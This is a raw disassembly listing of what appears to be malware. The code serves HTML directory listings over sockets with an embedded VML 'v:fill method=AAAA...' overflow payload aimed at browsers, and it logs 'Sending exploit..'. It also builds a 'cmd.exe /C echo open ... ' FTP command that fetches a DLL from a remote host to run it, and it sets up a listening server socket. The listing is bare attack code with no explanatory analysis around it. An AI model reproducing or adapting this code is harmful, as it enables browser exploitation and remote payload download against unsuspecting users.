lea edx, [ebp+buf]
push edx ; buf
mov eax, [ebp+s]
push eax ; s
call ds:send ; send
push offset aHead_0 ; "</head>\r\n"
push 200h ; Count
lea ecx, [ebp+buf]
push ecx ; Dest
call ds:_snprintf ; _snprintf
add esp, 0Ch
push 0 ; flags
lea edx, [ebp+buf]
push edx ; Str
call strlen ; strlen
add esp, 4
push eax ; len
lea eax, [ebp+buf]
push eax ; buf
mov ecx, [ebp+s]
push ecx ; s
call ds:send ; send
push offset aBody ; "<body>\r\n"
push 200h ; Count
lea edx, [ebp+buf]
push edx ; Dest
call ds:_snprintf ; _snprintf
add esp, 0Ch
push 0 ; flags
lea eax, [ebp+buf]
push eax ; Str
call strlen ; strlen
add esp, 4
push eax ; len
lea ecx, [ebp+buf]
push ecx ; buf
mov edx, [ebp+s]
push edx ; s
call ds:send ; send
push offset aVFillMethodAaa ; "<v:fill method=AAAAAAAAAAAAAAAAAAAAAAAA"...
push 200h ; Count
lea eax, [ebp+buf]
push eax ; Dest
call ds:_snprintf ; _snprintf
add esp, 0Ch
push 0 ; flags
lea ecx, [ebp+buf]
push ecx ; Str
call strlen ; strlen
add esp, 4
push eax ; len
lea edx, [ebp+buf]
push edx ; buf
mov eax, [ebp+s]
push eax ; s
call ds:send ; send
push offset aVRect ; "</v:rect>\r\n"
push 200h ; Count
lea ecx, [ebp+buf]
push ecx ; Dest
call ds:_snprintf ; _snprintf
add esp, 0Ch
push 0 ; flags
lea edx, [ebp+buf]
push edx ; Str
call strlen ; strlen
add esp, 4
push eax ; len
lea eax, [ebp+buf]
push eax ; buf
mov ecx, [ebp+s]
push ecx ; s
call ds:send ; send
push offset aBody_0 ; "</body>\r\n"
push 200h ; Count
lea edx, [ebp+buf]
push edx ; Dest
call ds:_snprintf ; _snprintf
add esp, 0Ch
push 0 ; flags
lea eax, [ebp+buf]
push eax ; Str
call strlen ; strlen
add esp, 4
push eax ; len
lea ecx, [ebp+buf]
push ecx ; buf
mov edx, [ebp+s]
push edx ; s
call ds:send ; send
push offset aHtml ; "</html>\r\n"
push 200h ; Count
lea eax, [ebp+buf]
push eax ; Dest
call ds:_snprintf ; _snprintf
add esp, 0Ch
push 0 ; flags
lea ecx, [ebp+buf]
push ecx ; Str
call strlen ; strlen
add esp, 4
push eax ; len
lea edx, [ebp+buf]
push edx ; buf
mov eax, [ebp+s]
push eax ; s
call ds:send ; send
push offset byte_1002C868 ; Format
push offset aSSendingExploi ; "%s Sending exploit.."
call sub_10007303
add esp, 8
mov [ebp+var_DA0], 0
mov ecx, 0FFh
xor eax, eax
lea edi, [ebp+var_D9F]
rep stosd
stosw
stosb
call sub_10006FA2
push eax
push offset aS_dll_0 ; "%s.dll"
push 10h ; Count
lea ecx, [ebp+Dest]
push ecx ; Dest
call ds:_snprintf ; _snprintf
add esp, 10h
lea edx, [ebp+Dest]
push edx
lea eax, [ebp+Dest]
push eax
xor ecx, ecx
mov cx, hostshort
push ecx
push offset Dest
push offset aCmd_exeCEcho_0 ; "cmd.exe /C echo open %s %hu>x&echo user"...
push 400h ; Count
lea edx, [ebp+var_D11]
push edx ; Dest
call ds:_snprintf ; _snprintf
add esp, 1Ch
mov [ebp+var_5A0], eax
mov eax, dword_10012A5C
add eax, 1
mov dword_10012A5C, eax
jmp short loc_100028CE
; ---------------------------------------------------------------------------
loc_10002891: ; CODE XREF: sub_100024A5+73�j
push offset aVFillMethodA_0 ; "<v:fill method=AAAAAAAAAAAAAAAAAAAAAAAA"...
push 200h ; Count
lea ecx, [ebp+buf]
push ecx ; Dest
call ds:_snprintf ; _snprintf
add esp, 0Ch
push 0 ; flags
lea edx, [ebp+buf]
push edx ; Str
call strlen ; strlen
add esp, 4
push eax ; len
lea eax, [ebp+buf]
push eax ; buf
mov ecx, [ebp+s]
push ecx ; s
call ds:send ; send
loc_100028CE: ; CODE XREF: sub_100024A5+3EA�j
cmp [ebp+Source], 0
jz loc_1000298C
mov edx, [ebp+Source]
push edx ; Str
call strlen ; strlen
add esp, 4
cmp eax, 2
jbe loc_1000298C
mov eax, [ebp+Source]
push eax ; Str
call strlen ; strlen
add esp, 4
sub eax, 3
mov [ebp+var_DB4], eax
jmp short loc_10002913
; ---------------------------------------------------------------------------
loc_10002904: ; CODE XREF: sub_100024A5:loc_1000292F�j
mov ecx, [ebp+var_DB4]
sub ecx, 1
mov [ebp+var_DB4], ecx
loc_10002913: ; CODE XREF: sub_100024A5+45D�j
cmp [ebp+var_DB4], 0
jz short loc_10002931
mov edx, [ebp+Source]
add edx, [ebp+var_DB4]
movsx eax, byte ptr [edx]
cmp eax, 2Fh
jnz short loc_1000292F
jmp short loc_10002931
; ---------------------------------------------------------------------------
loc_1000292F: ; CODE XREF: sub_100024A5+486�j
jmp short loc_10002904
; ---------------------------------------------------------------------------
loc_10002931: ; CODE XREF: sub_100024A5+475�j
; sub_100024A5+488�j
mov ecx, [ebp+var_DB4]
add ecx, 1
push ecx ; Count
mov edx, [ebp+Source]
push edx ; Source
lea eax, [ebp+Dst]
push eax ; Dest
call ds:strncpy ; strncpy
add esp, 0Ch
push offset aVFillMethodA_1 ; "<v:fill method=AAAAAAAAAAAAAAAAAAAAAAAA"...
push 200h ; Count
lea ecx, [ebp+buf]
push ecx ; Dest
call ds:_snprintf ; _snprintf
add esp, 0Ch
push 0 ; flags
lea edx, [ebp+buf]
push edx ; Str
call strlen ; strlen
add esp, 4
push eax ; len
lea eax, [ebp+buf]
push eax ; buf
mov ecx, [ebp+s]
push ecx ; s
call ds:send ; send
loc_1000298C: ; CODE XREF: sub_100024A5+42D�j
; sub_100024A5+442�j
lea edx, [ebp+Str1]
push edx ; lpFindFileData
mov eax, [ebp+lpFileName]
push eax ; lpFileName
call ds:FindFirstFileA ; FindFirstFileA
mov [ebp+hFindFile], eax
loc_100029A3: ; CODE XREF: sub_100024A5:loc_10003063�j
lea ecx, [ebp+Str1]
push ecx ; lpFindFileData
mov edx, [ebp+hFindFile]
push edx ; hFindFile
call ds:FindNextFileA ; FindNextFileA
test eax, eax
jz loc_10003068
cmp [ebp+Str1.dwFileAttributes], 0
jz loc_10003063
push offset Str2 ; ".."
lea eax, [ebp+Str1.cFileName]
push eax ; Str1
call strcmp ; strcmp
add esp, 8
test eax, eax
jz loc_10003063
push offset a_ ; "."
lea ecx, [ebp+Str1.cFileName]
push ecx ; Str1
call strcmp ; strcmp
add esp, 8
test eax, eax
jz loc_10003063
lea edx, [ebp+FileTime]
push edx ; lpLocalFileTime
lea eax, [ebp+Str1.ftLastWriteTime]
push eax ; lpFileTime
call ds:FileTimeToLocalFileTime ; FileTimeToLocalFileTime
lea ecx, [ebp+SystemTime]
push ecx ; lpSystemTime
lea edx, [ebp+FileTime]
push edx ; lpFileTime
call ds:FileTimeToSystemTime ; FileTimeToSystemTime
mov eax, dword ptr [ebp+SystemTime.wHour]
and eax, 0FFFFh
cmp eax, 0Ch
jle short loc_10002A48
mov [ebp+var_25F4], offset aPm ; "PM"
jmp short loc_10002A52
; ---------------------------------------------------------------------------
loc_10002A48: ; CODE XREF: sub_100024A5+595�j
mov [ebp+var_25F4], offset aAm ; "AM"
loc_10002A52: ; CODE XREF: sub_100024A5+5A1�j
mov ecx, dword ptr [ebp+SystemTime.wHour]
and ecx, 0FFFFh
cmp ecx, 0Ch
jle short loc_10002A7A
mov edx, dword ptr [ebp+SystemTime.wHour]
and edx, 0FFFFh
sub edx, 0Ch
mov [ebp+var_25F8], edx
jmp short loc_10002A8B
; ---------------------------------------------------------------------------
loc_10002A7A: ; CODE XREF: sub_100024A5+5BC�j
mov eax, dword ptr [ebp+SystemTime.wHour]
and eax, 0FFFFh
mov [ebp+var_25F8], eax
loc_10002A8B: ; CODE XREF: sub_100024A5+5D3�j
mov ecx, [ebp+var_25F4]
push ecx
mov edx, dword ptr [ebp+SystemTime.wMinute]
and edx, 0FFFFh
push edx
mov eax, [ebp+var_25F8]
push eax
mov ecx, dword ptr [ebp+SystemTime.wYear]
and ecx, 0FFFFh
push ecx
mov edx, [ebp-58Eh]
and edx, 0FFFFh
push edx
mov eax, dword ptr [ebp+SystemTime.wMonth]
and eax, 0FFFFh
push eax
push offset a2_2d2_2d4d2_2d ; "%2.2d/%2.2d/%4d %2.2d:%2.2d %s"
push 28h ; Count
lea ecx, [ebp+var_584]
push ecx ; Dest
call ds:_snprintf ; _snprintf
add esp, 24h
mov edx, [ebp+Str1.dwFileAttributes]
and edx, 10h
test edx, edx
jz loc_10002DFB
mov eax, [ebp+var_318]
add eax, 1
mov [ebp+var_318], eax
cmp [ebp+Source], 0
jz loc_10002CF8
push offset aVFillMethodA_2 ; "<v:fill method=AAAAAAAAAAAAAAAAAAAAAAAA"...
push 200h ; Count
lea ecx, [ebp+buf]
push ecx ; Dest
call ds:_snprintf ; _snprintf
add esp, 0Ch
push 0 ; flags
lea edx, [ebp+buf]
push edx ; Str
call strlen ; strlen
add esp, 4
push eax ; len
lea eax, [ebp+buf]
push eax ; buf
mov ecx, [ebp+s]
push ecx ; s
call ds:send ; send
lea edx, [ebp+Str1.cFileName]
push edx
mov eax, [ebp+Source]
push eax
push offset aSS_0 ; "%s%s/"
push 200h ; Count
lea ecx, [ebp+buf]
push ecx ; Dest
call ds:_snprintf ; _snprintf
add esp, 14h
push 0 ; flags
lea edx, [ebp+buf]
push edx ; Str
call strlen ; strlen
add esp, 4
push eax ; len
lea eax, [ebp+buf]
push eax ; buf
mov ecx, [ebp+s]
push ecx ; s
call ds:send ; send
lea edx, [ebp+Str1.cFileName]
push edx ; Str
call strlen ; strlen
add esp, 4
cmp eax, [ebp+var_4]
jbe short loc_10002BC9
lea eax, [ebp+Str1.cFileName]
push eax
push offset aCode_29sGtCode ; "\"><CODE>%.29s>/</CODE></A>"
push 200h ; Count
lea ecx, [ebp+buf]
push ecx ; Dest
call ds:_snprintf ; _snprintf
add esp, 10h
jmp short loc_10002BEA
; ---------------------------------------------------------------------------
loc_10002BC9: ; CODE XREF: sub_100024A5+6FF�j
lea edx, [ebp+Str1.cFileName]
push edx
push offset aCodeSCodeA ; "\"><CODE>%s/</CODE></A>"
push 200h ; Count
lea eax, [ebp+buf]
push eax ; Dest
call ds:_snprintf ; _snprintf
add esp, 10h
loc_10002BEA: ; CODE XREF: sub_100024A5+722�j
push 0 ; flags
lea ecx, [ebp+buf]
push ecx ; Str
call strlen ; strlen
add esp, 4
push eax ; len
lea edx, [ebp+buf]
push edx ; buf
mov eax, [ebp+s]
push eax ; s
call ds:send ; send
mov ecx, [ebp+var_210]
push ecx
lea edx, [ebp+var_584]
push edx
mov eax, [ebp+var_20C]
push eax
push offset aTdTdWidthDCode ; "</TD>\r\n<TD WIDTH=\"%d\"><CODE>%s</CODE></"...
push 200h ; Count
lea ecx, [ebp+buf]
push ecx ; Dest
call ds:_snprintf ; _snprintf
add esp, 18h
push 0 ; flags
lea edx, [ebp+buf]
push edx ; Str
call strlen ; strlen
add esp, 4
push eax ; len
lea eax, [ebp+buf]
push eax ; buf
mov ecx, [ebp+s]
push ecx ; s
call ds:send ; send
push offset byte_1002C868 ; Format
push offset aSSendingExpl_0 ; "%s Sending exploit.."
call sub_10007303
add esp, 8
mov [ebp+var_15B8], 0
mov ecx, 0FFh
xor eax, eax
lea edi, [ebp+var_15B7]
rep stosd
stosw
stosb
call sub_10006FA2
push eax
push offset aS_dll_1 ; "%s.dll"
push 10h ; Count
lea edx, [ebp+var_15C8]
push edx ; Dest
call ds:_snprintf ; _snprintf
add esp, 10h
lea eax, [ebp+var_15C8]
push eax
lea ecx, [ebp+var_15C8]
push ecx
xor edx, edx
mov dx, hostshort
push edx
push offset Dest
push offset aCmd_exeCEcho_1 ; "cmd.exe /C echo open %s %hu>x&echo user"...
push 400h ; Count
lea eax, [ebp+var_1529]
push eax ; Dest
call ds:_snprintf ; _snprintf
add esp, 1Ch
mov [ebp+var_DB8], eax
mov ecx, dword_10012A5C
add ecx, 1
mov dword_10012A5C, ecx
jmp loc_10002DF6
; ---------------------------------------------------------------------------
loc_10002CF8: ; CODE XREF: sub_100024A5+662�j
lea edx, [ebp+Str1.cFileName]
push edx
push offset aS ; "<%s>"
push 100h ; Count
lea eax, [ebp+var_314]
push eax ; Dest
call ds:_snprintf ; _snprintf
add esp, 10h
lea ecx, [ebp+var_584]
push ecx
lea edx, [ebp+var_314]
push edx
push offset a31s21s ; "%-31s %-21s\r\n"
push 200h ; Count
lea eax, [ebp+buf]
push eax ; Dest
call ds:_snprintf ; _snprintf
add esp, 14h
push 0 ; flags
lea ecx, [ebp+buf]
push ecx ; Str
call strlen ; strlen
add esp, 4
push eax ; len
lea edx, [ebp+buf]
push edx ; buf
mov eax, [ebp+s]
push eax ; s
call ds:send ; send
push offset byte_1002C868 ; Format
push offset aSSendingExpl_1 ; "%s Sending exploit.."
call sub_10007303
add esp, 8
mov [ebp+var_1DCC], 0
mov ecx, 0FFh
xor eax, eax
lea edi, [ebp+var_1DCB]
rep stosd
stosw
stosb
call sub_10006FA2
push eax
push offset aS_dll_2 ; "%s.dll"
push 10h ; Count
lea ecx, [ebp+var_1DDC]
push ecx ; Dest
call ds:_snprintf ; _snprintf
add esp, 10h
lea edx, [ebp+var_1DDC]
push edx
lea eax, [ebp+var_1DDC]
push eax
xor ecx, ecx
mov cx, hostshort
push ecx
push offset Dest
push offset aCmd_exeCEcho_2 ; "cmd.exe /C echo open %s %hu>x&echo user"...
push 400h ; Count
lea edx, [ebp+var_1D3D]
push edx ; Dest
call ds:_snprintf ; _snprintf
add esp, 1Ch
mov [ebp+var_15CC], eax
mov eax, dword_10012A5C
add eax, 1
mov dword_10012A5C, eax
loc_10002DF6: ; CODE XREF: sub_100024A5+84E�j
jmp loc_10003063
; ---------------------------------------------------------------------------
loc_10002DFB: ; CODE XREF: sub_100024A5+649�j
mov ecx, [ebp+var_31C]
add ecx, 1
mov [ebp+var_31C], ecx
cmp [ebp+Source], 0
jz loc_10003011
mov edx, [ebp+var_208]
push edx
push offset aTrTdWidthDAHre ; "<TR>\r\n<TD WIDTH=\"%d\"><A HREF=\""
push 200h ; Count
lea eax, [ebp+buf]
push eax ; Dest
call ds:_snprintf ; _snprintf
add esp, 10h
push 0 ; flags
lea ecx, [ebp+buf]
push ecx ; Str
call strlen ; strlen
add esp, 4
push eax ; len
lea edx, [ebp+buf]
push edx ; buf
mov eax, [ebp+s]
push eax ; s
call ds:send ; send
lea ecx, [ebp+Str1.cFileName]
push ecx
mov edx, [ebp+Source]
push edx
push offset aSS_1 ; "%s%s"
push 200h ; Count
lea eax, [ebp+buf]
push eax ; Dest
call ds:_snprintf ; _snprintf
add esp, 14h
push 0 ; flags
lea ecx, [ebp+buf]
push ecx ; Str
call strlen ; strlen
add esp, 4
push eax ; len
lea edx, [ebp+buf]
push edx ; buf
mov eax, [ebp+s]
push eax ; s
call ds:send ; send
lea ecx, [ebp+Str1.cFileName]
push ecx ; Str
call strlen ; strlen
add esp, 4
mov edx, [ebp+var_4]
add edx, 1
cmp eax, edx
jbe short loc_10002EDC
lea eax, [ebp+Str1.cFileName]
push eax
push offset aCode_30sGtCode ; "\"><CODE>%.30s></CODE></A>"
push 200h ; Count
lea ecx, [ebp+buf]
push ecx ; Dest
call ds:_snprintf ; _snprintf
add esp, 10h
jmp short loc_10002EFD
; ---------------------------------------------------------------------------
loc_10002EDC: ; CODE XREF: sub_100024A5+A12�j
lea edx, [ebp+Str1.cFileName]
push edx
push offset aCodeSCodeA_0 ; "\"><CODE>%s</CODE></A>"
push 200h ; Count
lea eax, [ebp+buf]
push eax ; Dest
call ds:_snprintf ; _snprintf
add esp, 10h
loc_10002EFD: ; CODE XREF: sub_100024A5+A35�j
push 0 ; flags
lea ecx, [ebp+buf]
push ecx ; Str
call strlen ; strlen
add esp, 4
push eax ; len
lea edx, [ebp+buf]
push edx ; buf
mov eax, [ebp+s]
push eax ; s
call ds:send ; send
mov ecx, [ebp+Str1.nFileSizeLow]
shr ecx, 0Ah
push ecx
mov edx, [ebp+var_210]
push edx
lea eax, [ebp+var_584]
push eax
mov ecx, [ebp+var_20C]
push ecx
push offset aTdTdWidthDCo_0 ; "</TD>\r\n<TD WIDTH=\"%d\"><CODE>%s</CODE></"...
push 200h ; Count
lea edx, [ebp+buf]
push edx ; Dest
call ds:_snprintf ; _snprintf
add esp, 1Ch
push 0 ; flags
lea eax, [ebp+buf]
push eax ; Str
call strlen ; strlen
add esp, 4
push eax ; len
lea ecx, [ebp+buf]
push ecx ; buf
mov edx, [ebp+s]
push edx ; s
call ds:send ; send
push offset byte_1002C868 ; Format
push offset aSSendingExpl_2 ; "%s Sending exploit.."
call sub_10007303
add esp, 8
mov [ebp+var_25E0], 0
mov ecx, 0FFh
xor eax, eax
lea edi, [ebp+var_25DF]
rep stosd
stosw
stosb
call sub_10006FA2
push eax
push offset aS_dll_3 ; "%s.dll"
push 10h ; Count
lea eax, [ebp+var_25F0]
push eax ; Dest
call ds:_snprintf ; _snprintf
add esp, 10h
lea ecx, [ebp+var_25F0]
push ecx
lea edx, [ebp+var_25F0]
push edx
xor eax, eax
mov ax, hostshort
push eax
push offset Dest
push offset aCmd_exeCEcho_3 ; "cmd.exe /C echo open %s %hu>x&echo user"...
push 400h ; Count
lea ecx, [ebp+var_2551]
push ecx ; Dest
call ds:_snprintf ; _snprintf
add esp, 1Ch
mov [ebp+var_1DE0], eax
mov edx, dword_10012A5C
add edx, 1
mov dword_10012A5C, edx
jmp short loc_10003063
; ---------------------------------------------------------------------------
loc_10003011: ; CODE XREF: sub_100024A5+969�j
mov eax, [ebp+Str1.nFileSizeLow]
push eax
lea ecx, [ebp+var_584]
push ecx
lea edx, [ebp+Str1.cFileName]
push edx
push offset a31s21sIBytes ; "%-31s %-21s (%i bytes)\r\n"
push 200h ; Count
lea eax, [ebp+buf]
push eax ; Dest
call ds:_snprintf ; _snprintf
add esp, 18h
push 0 ; flags
lea ecx, [ebp+buf]
push ecx ; Str
call strlen ; strlen
add esp, 4
push eax ; len
lea edx, [ebp+buf]
push edx ; buf
mov eax, [ebp+s]
push eax ; s
call ds:send ; send
loc_10003063: ; CODE XREF: sub_100024A5+521�j
; sub_100024A5+53D�j ...
jmp loc_100029A3
; ---------------------------------------------------------------------------
loc_10003068: ; CODE XREF: sub_100024A5+514�j
mov ecx, [ebp+hFindFile]
push ecx ; hFindFile
call ds:FindClose ; FindClose
cmp [ebp+Source], 0
jz short loc_10003097
push offset aTrTdColspan3Hr ; "<TR>\r\n<TD COLSPAN=\"3\"><HR></TD>\r\n</TR>\r"...
push 200h ; Count
lea edx, [ebp+buf]
push edx ; Dest
call ds:_snprintf ; _snprintf
add esp, 0Ch
jmp short loc_100030B1
; ---------------------------------------------------------------------------
loc_10003097: ; CODE XREF: sub_100024A5+BD4�j
push offset aVFillMethodA_3 ; "<v:fill method=AAAAAAAAAAAAAAAAAAAAAAAA"...
push 200h ; Count
lea eax, [ebp+buf]
push eax ; Dest
call ds:_snprintf ; _snprintf
add esp, 0Ch
loc_100030B1: ; CODE XREF: sub_100024A5+BF0�j
push 0 ; flags
lea ecx, [ebp+buf]
push ecx ; Str
call strlen ; strlen
add esp, 4
push eax ; len
lea edx, [ebp+buf]
push edx ; buf
mov eax, [ebp+s]
push eax ; s
call ds:send ; send
pop edi
mov esp, ebp
pop ebp
retn
sub_100024A5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_100030D9(int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,SOCKET s,LPCSTR lpFileName)
sub_100030D9 proc near ; CODE XREF: StartAddress+272�p
Dest = byte ptr -0C2Ch
var_C1C = byte ptr -0C1Ch
var_C1B = byte ptr -0C1Bh
var_B8D = byte ptr -0B8Dh
var_41C = dword ptr -41Ch
var_418 = dword ptr -418h
NumberOfBytesRead= dword ptr -414h
len = dword ptr -410h
Dst = byte ptr -40Ch
lDistanceToMove = dword ptr -0Ch
var_8 = dword ptr -8
hObject = dword ptr -4
s = dword ptr 314h
lpFileName = dword ptr 318h
push ebp
mov ebp, esp
sub esp, 0C2Ch
push edi
mov [ebp+len], 400h
mov [ebp+NumberOfBytesRead], 0
push 0 ; hTemplateFile
push 0 ; dwFlagsAndAttributes
push 3 ; dwCreationDisposition
push 0 ; lpSecurityAttributes
push 1 ; dwShareMode
push 80000000h ; dwDesiredAccess
mov eax, [ebp+lpFileName]
push eax ; lpFileName
call ds:CreateFileA ; CreateFileA
mov [ebp+hObject], eax
cmp [ebp+hObject], 0FFFFFFFFh
jnz short loc_10003121
jmp loc_10003299
; ---------------------------------------------------------------------------
loc_10003121: ; CODE XREF: sub_100030D9+41�j
push 0 ; lpFileSizeHigh
mov ecx, [ebp+hObject]
push ecx ; hFile
call ds:GetFileSize ; GetFileSize
mov [ebp+var_8], eax
loc_10003130: ; CODE XREF: sub_100030D9+1AB�j
cmp [ebp+var_8], 0
jz loc_10003289
push offset byte_1002C868 ; Format
push offset aSSendingExpl_3 ; "%s Sending exploit.."
call sub_10007303
add esp, 8
mov [ebp+var_C1C], 0
mov ecx, 0FFh
xor eax, eax
lea edi, [ebp+var_C1B]
rep stosd
stosw
stosb
call sub_10006FA2
push eax
push offset aS_dll_4 ; "%s.dll"
push 10h ; Count
lea edx, [ebp+Dest]
push edx ; Dest
call ds:_snprintf ; _snprintf
add esp, 10h
lea eax, [ebp+Dest]
push eax
lea ecx, [ebp+Dest]
push ecx
xor edx, edx
mov dx, hostshort
push edx
push offset Dest
push offset aCmd_exeCEcho_4 ; "cmd.exe /C echo open %s %hu>x&echo user"...
push 400h ; Count
lea eax, [ebp+var_B8D]
push eax ; Dest
call ds:_snprintf ; _snprintf
add esp, 1Ch
mov [ebp+var_41C], eax
mov ecx, dword_10012A5C
add ecx, 1
mov dword_10012A5C, ecx
push 400h ; Size
push 0 ; Val
lea edx, [ebp+Dst]
push edx ; Dst
call memset ; memset
add esp, 0Ch
mov eax, [ebp+len]
cmp eax, [ebp+var_8]
jbe short loc_100031F8
mov ecx, [ebp+var_8]
mov [ebp+len], ecx
loc_100031F8: ; CODE XREF: sub_100030D9+114�j
xor edx, edx
sub edx, [ebp+var_8]
mov [ebp+lDistanceToMove], edx
push 2 ; dwMoveMethod
push 0 ; lpDistanceToMoveHigh
mov eax, [ebp+lDistanceToMove]
push eax ; lDistanceToMove
mov ecx, [ebp+hObject]
push ecx ; hFile
call ds:SetFilePointer ; SetFilePointer
push 0 ; lpOverlapped
lea edx, [ebp+NumberOfBytesRead]
push edx ; lpNumberOfBytesRead
mov eax, [ebp+len]
push eax ; nNumberOfBytesToRead
lea ecx, [ebp+Dst]
push ecx ; lpBuffer
mov edx, [ebp+hObject]
push edx ; hFile
call ds:ReadFile ; ReadFile
push 0 ; flags
mov eax, [ebp+len]
push eax ; len
lea ecx, [ebp+Dst]
push ecx ; buf
mov edx, [ebp+s]
push edx ; s
call ds:send ; send
mov [ebp+var_418], eax
cmp [ebp+var_418], 0FFFFFFFFh
jnz short loc_10003278
call ds:WSAGetLastError ; WSAGetLastError
cmp eax, 2733h
jz short loc_1000326E
jmp short loc_10003289
; ---------------------------------------------------------------------------
loc_1000326E: ; CODE XREF: sub_100030D9+191�j
mov [ebp+var_418], 0
loc_10003278: ; CODE XREF: sub_100030D9+184�j
mov eax, [ebp+var_8]
sub eax, [ebp+var_418]
mov [ebp+var_8], eax
jmp loc_10003130
; ---------------------------------------------------------------------------
loc_10003289: ; CODE XREF: sub_100030D9+5B�j
; sub_100030D9+193�j
cmp [ebp+hObject], 0FFFFFFFFh
jz short loc_10003299
mov ecx, [ebp+hObject]
push ecx ; hObject
call ds:CloseHandle ; CloseHandle
loc_10003299: ; CODE XREF: sub_100030D9+43�j
; sub_100030D9+1B4�j
pop edi
mov esp, ebp
pop ebp
retn
sub_100030D9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
; DWORD __stdcall sub_1000329E(LPVOID)
sub_1000329E proc near ; DATA XREF: sub_10007424+19CE�o
var_2E88 = dword ptr -2E88h
var_2E84 = dword ptr -2E84h
var_2E80 = dword ptr -2E80h
Dest = byte ptr -2E7Ch
var_2E6C = byte ptr -2E6Ch
var_2E6B = byte ptr -2E6Bh
var_2DDD = byte ptr -2DDDh
var_266C = dword ptr -266Ch
var_2668 = dword ptr -2668h
var_2664 = dword ptr -2664h
readfds = fd_set ptr -2660h
var_255C = dword ptr -255Ch
var_2558 = dword ptr -2558h
var_2554 = dword ptr -2554h
argp = dword ptr -2458h
Str = byte ptr -2454h
var_2354 = dword ptr -2354h
hostshort = word ptr -234Ch
var_214A = byte ptr -214Ah
var_2048 = dword ptr -2048h
Source = dword ptr -2044h
name = sockaddr ptr -2040h
Dst = byte ptr -2030h
var_1030 = dword ptr -1030h
fd = dword ptr -102Ch
s = dword ptr -1028h
addrlen = dword ptr -1024h
var_1020 = dword ptr -1020h
var_101C = dword ptr -101Ch
Str1 = byte ptr -1018h
addr = sockaddr ptr -18h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 2E88h
call __alloca_probe
push esi
push edi
mov [ebp+argp], 1
mov [ebp+Source], offset dword_10012A60
mov esi, [ebp+arg_0]
mov ecx, 0C4h
lea edi, [ebp+var_2354]
rep movsd
mov eax, [ebp+arg_0]
mov [ebp+var_1030], eax
mov ecx, [ebp+var_1030]
mov byte ptr [ecx+30Bh], 1
mov [ebp+name.sa_family], 2
mov dx, [ebp+hostshort]
push edx ; hostshort
call ds:htons ; htons
mov word ptr [ebp+name.sa_data], ax
mov dword ptr [ebp+name.sa_data+2], 0
push 8 ; Size
push 0 ; Val
lea eax, [ebp+name.sa_data+6]
push eax ; Dst
call memset ; memset
add esp, 0Ch
push 0 ; protocol
push 1 ; type
push 2 ; af
call ds:socket ; socket
mov [ebp+s], eax
cmp [ebp+s], 0FFFFFFFFh
jz loc_100039DA
push 10h ; namelen
lea ecx, [ebp+name]
push ecx ; name
mov edx, [ebp+s]
push edx ; s
call ds:bind ; bind
cmp eax, 0FFFFFFFFh
jz loc_100039DA
push 7FFFFFFFh ; backlog
mov eax, [ebp+s]
push eax ; s
call ds:listen ; listen
cmp eax, 0FFFFFFFFh
jz loc_100039DA
lea ecx, [ebp+argp]
push ecx ; argp
push 8004667Eh ; cmd
mov edx, [ebp+s]
push edx ; s
call ds:ioctlsocket ; ioctlsocket
cmp eax, 0FFFFFFFFh
jz loc_100039DA
mov [ebp+var_255C], 0
mov [ebp+readfds.fd_count], 0
loc_100033B1: ; CODE XREF: sub_1000329E+192�j
mov [ebp+var_2664], 0
jmp short loc_100033CC
; ---------------------------------------------------------------------------
loc_100033BD: ; CODE XREF: sub_1000329E:loc_100033F1�j
mov eax, [ebp+var_2664]
add eax, 1
mov [ebp+var_2664], eax
loc_100033CC: ; CODE XREF: sub_1000329E+11D�j
mov ecx, [ebp+var_2664]
cmp ecx, [ebp+var_255C]
jnb short loc_100033F3
mov edx, [ebp+var_2664]
mov eax, [ebp+edx*4+var_2558]
cmp eax, [ebp+s]
jnz short loc_100033F1
jmp short loc_100033F3
; ---------------------------------------------------------------------------
loc_100033F1: ; CODE XREF: sub_1000329E+14F�j
jmp short loc_100033BD
; ---------------------------------------------------------------------------
loc_100033F3: ; CODE XREF: sub_1000329E+13A�j
; sub_1000329E+151�j
mov ecx, [ebp+var_2664]
cmp ecx, [ebp+var_255C]
jnz short loc_1000342C
cmp [ebp+var_255C], 40h
jnb short loc_1000342C
mov edx, [ebp+var_2664]
mov eax, [ebp+s]
mov [ebp+edx*4+var_2558], eax
mov ecx, [ebp+var_255C]
add ecx, 1
mov [ebp+var_255C], ecx
loc_1000342C: ; CODE XREF: sub_1000329E+161�j
; sub_1000329E+16A�j
xor edx, edx
test edx, edx
jnz loc_100033B1
mov eax, [ebp+s]
mov [ebp+var_101C], eax
loc_10003442: ; CODE XREF: sub_1000329E:loc_100039D5�j
mov ecx, 1
test ecx, ecx
jz loc_100039DA
mov ecx, 41h
lea esi, [ebp+var_255C]
lea edi, [ebp+readfds]
rep movsd
push 0 ; timeout
push 0 ; exceptfds
push 0 ; writefds
lea edx, [ebp+readfds]
push edx ; readfds
mov eax, [ebp+var_101C]
add eax, 1
push eax ; nfds
call ds:select ; select
cmp eax, 0FFFFFFFFh
jnz short loc_10003489
jmp loc_100039DA
; ---------------------------------------------------------------------------
loc_10003489: ; CODE XREF: sub_1000329E+1E4�j
mov [ebp+fd], 0
jmp short loc_100034A4
; ---------------------------------------------------------------------------
loc_10003495: ; CODE XREF: sub_1000329E+276�j
; sub_1000329E:loc_100039D0�j
mov ecx, [ebp+fd]
add ecx, 1
mov [ebp+fd], ecx
loc_100034A4: ; CODE XREF: sub_1000329E+1F5�j
mov edx, [ebp+fd]
cmp edx, [ebp+var_101C]
ja loc_100039D5
lea eax, [ebp+readfds]
push eax ; fd_set *
mov ecx, [ebp+fd]
push ecx ; fd
call __WSAFDIsSet ; __WSAFDIsSet
test eax, eax
jz loc_100039D0
